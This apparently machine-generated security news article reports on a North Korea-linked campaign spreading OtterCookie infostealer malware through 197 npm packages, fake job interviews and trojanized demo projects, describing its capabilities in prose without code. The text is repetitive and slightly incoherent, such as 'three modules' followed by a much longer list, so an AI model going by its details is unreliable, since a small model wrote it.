Ethical Hacking News
The Contagious Interview campaign has expanded its malicious operations by distributing 197 new npm packages containing the OtterCookie malware. This comprehensive analysis delves into the campaign's infrastructure, tactics, and malware distribution methods, highlighting the growing threat landscape in the software development ecosystem.
The Contagious Interview campaign has expanded its malicious operations by distributing 197 new npm packages containing the OtterCookie malware. The OtterCookie malware is designed as an all-in-one infostealer and remote access tool, compromising systems through vulnerabilities in popular software development environments. The attackers used social engineering tactics, including fake job interviews and Trojanized demo projects, to deliver the malware-laden packages. The campaign has demonstrated a systematic operation, leveraging the npm ecosystem, GitHub, and Vercel as initial access channels. The OtterCookie payload functions as an all-in-one infostealer and remote access tool, allowing attackers to drain digital assets and loot high-value data. The campaign has updated its tactics by using JSON storage services to host and deliver malware through trojanized code projects.
Contagious Interview, a sophisticated and ongoing campaign linked to North Korea, has expanded its malicious operations by distributing 197 new npm packages containing the OtterCookie malware. This malware variant is designed to serve as an all-in-one infostealer and remote access tool, compromising systems by exploiting vulnerabilities in popular software development environments.
In November 2023, the Contagious Interview campaign began targeting software developers working on Windows, Linux, and macOS platforms, particularly those involved in crypto and Web3. Attackers employed social engineering tactics, including fake job interviews and Trojanized demo projects, to deliver malware-laden packages. These malicious npm packages were primarily used to spread the BeaverTail and OtterCookie infostealers, as well as InvisibleFerret RATs.
Since its inception, the campaign has demonstrated a systematic and factory-style operation, leveraging the npm ecosystem, GitHub, and Vercel as initial access channels. The attackers have developed a sophisticated infrastructure comprising multiple loader packages, a Vercel-hosted stager, and a threat actor-controlled GitHub account serving OtterCookie malware. This elaborate setup allows them to rotate payloads, customize attacks, and maintain low-level C2 activity until the second-stage malware launches.
The OtterCookie payload functions as an all-in-one infostealer and remote access tool, checking whether the victim uses a VM or sandbox and fingerprinting the system before contacting the C2 server. It then registers the machine, waits for tasks, and launches three modules in parallel: one stealing clipboard data every few seconds, providing attackers with interactive remote shell access, adding persistence on Windows, collecting Chrome and Brave credentials, extracting data from crypto-wallet extensions, logging keystrokes, capturing screenshots from all monitors, scanning the entire filesystem for secrets, wallets, and sensitive documents, and uploading everything to the C2 server. This comprehensive exploitation allows attackers to drain digital assets and loot high-value data from developer systems.
In mid-November, North Korea-linked actors behind the Contagious Interview campaign updated their tactics by using JSON storage services to host and deliver malware through trojanized code projects, according to a new NVISO report. The attackers have employed various techniques, including typosquatted GitHub repositories, cloned Knightsbridge DEX sites, and fake job assignments, to entice developers into installing compromised packages.
The Contagious Interview campaign serves as a prime example of the growing threat landscape in the software development ecosystem. Its use of social engineering tactics, combined with its sophisticated infrastructure and malware distribution methods, poses significant risks to organizations operating in high-risk industries such as finance, healthcare, and government. It is essential for developers to remain vigilant and stay informed about emerging threats to protect their systems and data.
Related Information:
https://www.ethicalhackingnews.com/articles/The-OtterCookie-Malware-Saga-A-Comprehensive-Analysis-of-the-Contagious-Interview-Campaigns-Expansive-npm-Package-Distribution-ehn.shtml
https://securityaffairs.com/185170/apt/contagious-interview-campaign-expands-with-197-npm-ppackages-spreading-new-ottercookie-malware.html
https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages
https://attack.mitre.org/software/S1246/
https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail
https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/
https://attack.mitre.org/software/S1245/
https://any.run/cybersecurity-blog/ottercookie-malware-analysis/
https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html
Published: Sat Nov 29 19:58:05 2025 by llama3.2 3B Q4_K_M
